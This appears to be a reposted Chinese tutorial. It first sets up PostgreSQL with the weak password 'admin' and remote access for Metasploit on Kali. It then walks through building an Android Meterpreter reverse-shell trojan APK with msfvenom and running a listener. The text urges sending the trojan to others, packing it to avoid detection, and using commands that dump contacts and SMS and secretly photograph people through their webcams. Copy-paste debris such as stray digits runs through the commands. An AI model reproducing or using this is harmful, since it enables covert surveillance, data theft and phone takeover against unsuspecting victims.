service postgresql start1
2、进入postgresql配置
sudo -u postgres psql
alter user postgres with password 'admin'12
注意2:分号!!!! 一定要带上分号””。
注意3:\q:退出数据库
3、修改linux系统的postgres用户的密码(密码与数据库用户postgres的密码相同)
root@kali:~# sudo passwd -d postgres
passwd:密码过期信息已更改。
root@kali:~# sudo -u postgres passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码123456
4、修改PostgresSQL数据库配置实现远程访问
root@kali:~# vi /etc/postgresql/9.4/main/postgresql.conf1
更改#listen_addresses = 'localhost'为listen_addresses = '*'
更改#password_encryption = on为password_encryption = on
root@kali:~# vi /etc/postgresql/9.4/main/pg_hba.conf1
在文档末尾加上以下内容
# to allow your client visiting postgresql server
host all all 0.0.0.0/32 md512
root@kali:~# service postgresql restart 1
注意1:”#”号,一定要把”#”删除掉。
注意2:在vi编辑模式下点击键盘字母a是进入编辑模式,编辑完成后点击“esc”退出编辑模式然后在最下方输入”:wq”保存并退出。
5、管理PostgreSQL用户和数据库
root@kali:~# psql -U postgres -h 127.0.0.1
用户 postgres 的口令:
psql (9.4.6)
SSL连接 (协议: TLSv1.2, 加密:ECDHE-RSA-AES256-GCM-SHA384,二进制位: 256, 压缩比: 关闭)
输入 "help" 来获取帮助信息.
postgres=# create user msf with password 'admin' nocreatedb
CREATE ROLE
postgres=# create database msf with owner=msf
CREATE DATABASE
postgres=# \q123456789101112
注意1:还是要注意分号!!!没有分号命令就无法执行。
注意2:注意复制的时候”“符号问题。
注意3:user后面是用户名,password后面是用户名对应的密码。
注意4:命令执行后有返回结果才是执行成功了。
6、msf配置连接
root@kali:~# msfconsole
msf >db_status
[*] postgresql selected, no connection
msf >db_connect msf:admin@127.0.0.1/msf
[*] Rebuilding the module cache in the background...
msf >db_status
[*] postgresql connected to msf
msf >12345678
db_connect -y /usr/share/metasploit-framework/config/database.yml1
在msf启动后连接数据库就好。
注意1:”msf:admin”这个是步骤5中的
“create user msf with password ‘admin’ nocreatedb”所建立的。
“127.0.0.1”是指本机。
“msf”这个是库名。
注意2:”[*] postgresql connected to msf”这个是说明以链接成功数据库。
7、配置自动连接
自动连接可以通过配置文件 /usr/share/metasploit-framework/config/database.yml 完成,内容可以通过复制database.yml.example并修改内容来完成设置。
root@kali:/usr/share/metasploit-framework/config#cp database.yml.example database.yml
root@kali:/usr/share/metasploit-framework/config#vi database.yml
root@kali:/usr/share/metasploit-framework/config#cat database.yml123
development: &pgsql
adapter: postgresql
database: msf
username: msf
password: admin
host: localhost
port: 5432
pool: 5
timeout: 5123456789
主要改database、password、host这三个值
重新执行msfconsole即可直接链接数据库
众所周知,msf是大家公认的神器!现在我就来说说到底怎么用msf呢
有很多人说,他们不会安装msfconsole
教程:
http://bbs.huluxia.com/wap/thread/829605.html?para=37Hftt%2B137bfsd%2B037Xfst%2B03p%2FfuN%2By37nftt%2Bw37U%3D%0A&product=tool
安装了msfconsole之后,在termux输入:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 R >/sdcard/mu.apk
其中
LHOST= 后面的数字是本地的ip,不是被攻击者的ip而是你自己的
LPORT= 是端口,高端口不容易被报毒,如果你不知道端口是什么那就不要改了
生成的木马在根目录的mu.apk(啰嗦)
那么接下来,我来教大家怎么监听吧
1.启动msfconsole(漫长):msfconsole
2.使用multi模块:use exploit/multi/handler
3.设置LHOST(跟木马的一样):set LHOST 192.168.2.117
4.设置LPORT(一样的):set LPORT 5555
5.设置payload:set payload android/meterpreter/reverse_tcp
6.启动监听:exploit
最后将木马发给别人就行啦
很多人说一看就知道是木马了!
在这里我说一句,你不会加个壳嘛?
ok!当鱼上吊的时候,会反dshell
命令:
dump_contacts 导出电话
dump_sms 导出信息
webcam_list 列出摄像头
webcam_stream 开启摄像
webcam_snap 偷拍一张照片
webcam_chat 视频通话
ps 列出所有进程
activity_start 启动其它应用
check_root 检查是否root
send_sms 发送指定信息
全部手机进行,免root进行
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)